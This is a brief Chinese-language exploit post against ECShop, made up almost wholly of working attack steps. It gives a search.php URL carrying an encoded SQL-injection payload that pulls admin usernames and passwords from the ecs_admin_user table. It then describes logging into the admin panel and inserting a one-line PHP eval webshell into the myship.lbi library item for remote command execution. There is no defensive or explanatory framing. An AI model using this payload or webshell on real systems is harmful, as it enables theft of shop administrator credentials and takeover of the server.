ECSHOP 搜索型注入exp及后台拿SHELL漏洞
这个是search.php exp 变种
| search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 |
拿SHELL登陆后台/admin/ 输入用户密码模块管理-库项目管理-选择myship.lbi里插入<?php eval($_REQUEST['c'])?>
连接http://127.0.0.1/myship.php一句话